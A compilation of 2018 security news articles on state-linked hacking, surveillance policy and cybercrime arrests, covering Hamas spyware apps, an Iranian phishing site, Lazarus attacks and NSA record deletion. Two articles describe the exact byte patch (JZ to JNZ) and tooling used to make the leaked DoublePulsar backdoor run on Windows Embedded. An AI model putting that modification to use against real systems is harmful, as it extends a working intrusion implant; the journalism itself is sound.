Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.

Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.

NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.2018 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers. “

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whom activity may pose a threat to the homeland security.

The National Security Agency received more call detail records (CDRs) that it was allowed to retain under the current law framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate properly produced data

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.


The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice that notified it to the Foreign Intelligence Surveillance Court.

This isn’t the first time that such kind of incident occurs, civil liberties journalist Marcy Wheeler published last year a catalog for all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet went under FISA in 2004.

Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.

Ops … the DoublePulsar NSA-Linked implant now works also on Windows Embedded devices
28.6.2018 securityaffairs BigBrothers

This is a very bad news for security community, the NSA-linked DoublePulsar exploit can now target Windows Embedded devices.
The DoublePulsar exploit was released publicly in April 2017 by ShadowBrockers hackers that allegedly stole them from the NSA.

The hackers leaked a huge trove of hacking tools and exploit codes used by the US intelligence agency, most of Windows exploits were addressed by Microsoft the month before.

DoublePulsar is sophisticated SMB backdoor that could allow attackers to control the infected systems since its leak it was working on almost any Windows system except on devices running a Windows Embedded operating system.

News of the day is that a security researcher who uses the online with the moniker of Capt. Meelo has developed a version of the DoublePulsar exploit code that also works on devices running a Windows Embedded operating system.

The experts discovered that even if the devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and discovered that the target device was indeed vulnerable via the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for Windows Embedded version. ” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

Summarizing the expert was able to exploit the EternalBlue attack against the target device but the deployment of the DoublePulsar backdoor was failing , so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used the @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to patch the modified exe file. and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload to the target host.

France Also Interested in Greece's Russian Bitcoin Suspect
28.6.2018 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 2018.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.

NSA-Linked Implant Patched to Work on Windows Embedded
28.6.2018 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even if the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handler of Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module and the result were successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the modified .exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload to the target host.

North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.2018 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have been already associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, seeking coordination of the economic policies between the wealthiest countries.

The HWP files include malicious code that fetches next stage malware (either a 32 or 64 bit version of Manuscrypt, which has been already detailed by other security researchers), a threat communicated by impersonating South Korean forum software. Decoy documents of resumes were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Apparently, it would be entirely possible for Lazarus to have hacked Bithumb earlier this month, considering that the group raided the exchange last year as well, which likely provided them with the necessary knowledge to do it again. Over the past year, the group targeted other crypto-currency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.

UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.2018 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

The Her Majesty’s Revenue and Customs agency collected these voice records via the Voice ID service that was launched in January 2017. The service was created to allow UK citizens to authenticate when calling HMRC call centers using their voice.

When the service was initially launched, the tax agency claimed users would be able to opt out of using it and continue to authenticate themselves by using usual methods.

The Big Brother Watch group discovered that there’s no opt-out option when users call the agency support line.

Every citizen accessing the service recorded a voice track to use with the Voice ID authentication feature

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database.” reads the Big Brother Watch.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Advocated at the Big Brother Watch group claim the HMRC is outlaw because it doesn’t provide a clear way of opting out and because there is no way to ask the agency to remove voice track from HMRC’s database.

The Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide instruction to the users on how to delete their voice tracks from HMRC’s database.


Another aspect that is still under investigation is how the agency manages voice tracks and if it shares them with third-parties and government agencies.

It is clear that the that the Her Majesty’s Revenue and Customs agency is not in compliance with the GDPR regulation that was adopted by EU member states.

Big Brother Watch officials are inviting Britons to file a complaint with the HMRC and with the UK’s Information Commissioner’s Office (ICO), this latter already started an official investigation into HMRC’s process.

Supreme Court of the US Police ruled that police need warrant for mobile location data
24.6.2018 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion.” reported The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making analog-era precedents prosecutors cited to justify such warrantless searches all but obsolete.”

location data

The decision aims at preventing surveillance activities operated by the government and protecting the privacy of the citizens under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies, this data allows to monitor almost any activity of citizens.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million
devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

Of course, the authorities can operate without a warrant when there are situations of danger for life of citizens or when handling national security issues.

The ruling came in the wake of Timothy Carpenter v. US case filed in 2011, when the US police arrested members of a gang who committed armed robberies at several stores.

Gang members confessed the group was led by Timothy Carpenter, a version that was verified by the Police obtaining a court order for Carpenter’s cell phone location information and verifying the presence of the suspect near the robberies.

Carpenter was condemned to more than 100 years in prison, but lawyers for the American Civil Liberties Union that represented him at the high court defined the decision “a truly historic vindication of privacy rights.”

The lawyers argued that a court order should not have been enough to obtain access to the mobile’s location data of the suspect, and a search warrant should have been obtained instead.

The Supreme Court ruling was praised by privacy advocated because it aims at defending the privacy of the citizens against any abuse.

China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.2018 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows SysInternals utility PSExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”

Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.2018 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.

In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.2018 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers, who introduced the amendment, include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiberoptic networks depend on US components and its cheap smartphones sold en masse abroad are powered by US chips and the Android operating system.

DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.Typeframe malware used by North Korea detailed by FBI and DHS

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.

Cyber Attack Aims to Manipulate Mexican Election
18.6.2018 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate2018.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during the period 12th-13th June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."

DHS, FBI published a join alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.2018 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by US DHS and FBI made the headlines, past document details TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report includes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponize Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”

Hidden Cobra

The security alert includes indicators of compromise (IoCs) for each of the sample analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The unique certainly is that North Korea continues to be one of the most aggressive and persistent threat actors in the cyberspace.

Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.2018 securityaffairs BigBrothers

The Europol announced that several French nationals were arrested in the past year on suspicion of being involved with notorious Rex Mundi crime gang.
Another success of the Europol made the headlines, the European police announced that several French nationals were arrested in the past year on suspicion of being involved with notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012. it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).

The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eight in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by the Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that lead to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues the Europol.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer that was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.

Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.2018 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that typically Singapore is not a top attack destination, and the skipe of the number of attacks coincides with Trump-Kim Jong-un meeting.

Most of the attacks originated from Russia (88% of overall attacks) and frankly speaking, I’m not surprised due to the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russian from June 11 to June 12 targeted Singapore.

